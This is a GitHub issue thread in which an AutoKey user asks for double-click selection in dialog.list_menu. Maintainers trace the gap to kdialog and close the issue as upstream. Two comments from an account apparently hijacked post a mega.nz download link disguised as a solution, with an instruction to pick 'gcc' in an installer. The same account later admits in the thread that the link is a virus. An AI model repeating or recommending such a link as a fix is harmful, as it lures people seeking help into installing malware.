### ISSUE TITLE
Feature: allow double click in dialog.list_menu

### ISSUE THREAD

**Issue by LucMorizur** [autokey/autokey#954]
### AutoKey is a Xorg application and will not function in a Wayland session. Do you use Xorg (X11) or Wayland?

Xorg

### Has this issue already been reported?

- [X] I have searched through the existing issues.

### Is this a question rather than an issue?

- [X] This is not a question.

### What type of issue is this?

Enhancement

### Choose one or more terms that describe this issue:

- [ ] autokey triggers
- [ ] autokey-gtk
- [X] autokey-qt
- [ ] beta
- [ ] bug
- [ ] critical
- [ ] development
- [ ] documentation
- [X] enhancement
- [ ] installation/configuration
- [ ] phrase expansion
- [ ] scripting
- [ ] technical debt
- [X] user interface

### Which Linux distribution did you use?

Ubuntu 22.04.4 LTS jammy; Linux 6.8.0-40-lowlatency #40.1~22.04.1-Ubuntu; Qt 5.15.3; KDE 5.92.0; plasmashell 5.24.7; X Server 1.21.1.4

### Which AutoKey GUI did you use?

Qt

### Which AutoKey version did you use?

AutoKey 0.95.10; Python 3.10.12

### How did you install AutoKey?

Installed thanks to apt (I think 😕)

### Can you briefly describe the issue?

The choices displayed in dialog.list_menu can't be chosen with a double-click. You have to click once on the choice you make, and then click on button "OK" so to validate your choice. This makes two actions, when it would be possible to validate your choice with only one action — ie the double-click.

### Can the issue be reproduced?

Always

### What are the steps to reproduce the issue?

Provide a choice list displayed with dialog.list_menu command
Choose one item with double-click
Your choice is not validated

### What should have happened?

It would be better if the choice could be validated thanks to a double-click.

### What actually happened?

Double-click has same effect than single click

### Do you have screenshots?

Don't think screenshot would be appropriate here.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by LucMorizur** [comment]
Many thanks [Zoraaa-z](https://github.com/Zoraaa-z) . Yet, could you please tell a little bit more on this solution please? I love to know about things I install on my computer 😶.

**Comment by Zoraaa-z** [comment]
> Many thanks [Zoraaa-z](https://github.com/Zoraaa-z) . Yet, could you please tell a little bit more on this solution please? I love to know about things I install on my computer 😶.

Sorry bro, it's a virus link, don't click on it, someone just hacked my account 😭

**Comment by LucMorizur** [comment]
Hopefully, it was blocked by my browser. Can't you remove the fake comments, or edit them?

**Comment by josephj11** [comment]
AutoKey uses the kdialog system for dialogs in the Qt front end and Zenity for the GTK front end.
So, if you can demonstrate how to attain this feature in a standalone dialog using either of the above, we might be able to implement it in AutoKey.

If that can't be done, then we would have to replace one or both of those packages with a different dialog manager or write one from scratch - both of which are extremely unlikely to be attempted.

If you do find a dialog manager (or options to the above dialog managers that we don't support)  that works to your liking, there is nothing stopping you from calling out to it from your scripts using subprocess(), etc. I'm a fan of yad and got it to work this way. Similarly, if you are adept in Qt or GTK, you can code whatever interface you want and use it.

**Comment by LucMorizur** [comment]
Many thanks [josephj11](https://github.com/josephj11) for your answer. OK, I now see that it is kdialog and zenity which are used. Trying with these two tools, I noticed that only kdialog --radiolist doesn't react to double-click; zenity --list reacts properly. I shall open a ticket on kdialog development for adding this feature; in the meanwhile, a workaround could be to force using the GTK zenity when KDE Qt kdialog would be used by default.

**Comment by josephj11** [comment]
Somewhat off topic, but if you like Zenity, check out yad. It's a fork of Zenity that has some additional features...

Let us know if you get anywhere with the kdialog issue.

Can we close this issue as won't fix or upstream...?

**Comment by LucMorizur** [comment]
> Somewhat off topic, but if you like Zenity, check out yad. It's a fork of Zenity that has some additional features...

OK, thanks, I'll have a look.

> Let us know if you get anywhere with the kdialog issue.

Yes of course.

> Can we close this issue as won't fix or upstream...?

Yes indeed.

Thanks!
